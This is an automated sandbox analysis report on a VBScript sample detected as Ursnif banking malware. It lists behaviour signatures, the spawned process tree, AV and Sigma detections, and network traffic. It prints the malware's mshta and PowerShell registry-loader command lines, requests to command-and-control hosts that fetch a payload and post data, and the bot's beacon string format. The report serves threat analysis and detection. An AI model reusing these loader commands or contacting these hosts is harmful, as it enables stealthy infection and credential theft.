Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 0k4Vu1eOEIhU.vbs

Overview

General Information

Sample Name:0k4Vu1eOEIhU.vbs
Analysis ID:321161
MD5:a3ba204668130312404ae877445921c1
SHA1:65f172cb351f3bf1b51b24ecf837dd1dab1731e0
SHA256:c16c0ad19dc1f015c92f3232a1eaa069b71f99695331a12a67a650c4c7bdbf75

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6732 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6360 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6348 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5652 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6112 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6356 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5336 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6140 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5884 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • control.exe (PID: 5232 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 5392 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 14 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6112, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6356
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5232, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5392

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdAvira: detection malicious, Label: TR/Crypt.XDR.Gen
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdReversingLabs: Detection: 45%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 35_2_061037B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/4hPW9kKqFHoPCbkici7/axeaBmAwInlm_2BMwjoNQF/DBqPIV6fxiDUx/O8IYQJ_2/FHfs18Nkn9y513u4F9SUOJw/kNmy8dvo70/7jCyOgfNyGln8LENF/ErRL2pQStqN1/9Qq_2BuUJKP/_2Fjcn_2BotOm5/cEi3nGid_2FTEjNr_2B_2/FztACtnep14lNaww/g259IbS6qj0nWTz/Gh1DisQwgNRag12JVP/NBztCoN0H/TGOsfxOOicoc9Giue0bG/lBoyH_2B2mbkCnKCsUn/FC1_0A_0D28OMwhi9pqja2/n506RnxvrVDkJ/nlxG9FcdJ_/2Btn0wAIu/7J2m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2FvJp2IQ4IZi8SCWS/gz5OHLXug/fyQYX3fieMX_2FjcAjW8/hzShghlLicWrj3lQfLt/rhQSYVCKzEiMW_2FO85OZQ/XR6_2BLXNmR15/9Qh_2F4q/grWd_2FFp65v_2FIzQ3F6ge/ak2ymGZicE/UE_2FuPPw8_2BZGEv/QsAL_2Bz08MJ/CIkIoxpdM5N/NWEb4k99CP_2B5/mG4eGNV4kLLjNZpk_0A_0/DnyTv6YNSCi2606v/WegLk1STDZJMFeZ/ibnQp1hQgDMJwqC/jc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 12:33:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: {0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drString found in binary or memory: http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM
            Source: {0F633129-2B78-11EB-90E4-ECF4BB862DED}.dat.9.dr, ~DFD893D4E6D1758C04.TMP.9.drString found in binary or memory: http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5
            Source: explorer.exe, 00000023.00000000.372681916.0000000008A1F000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyH
            Source: RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462j
            Source: {15B14822-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy
            Source: explorer.exe, 00000023.00000002.472481420.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://api3.lepini.at/api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2F
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
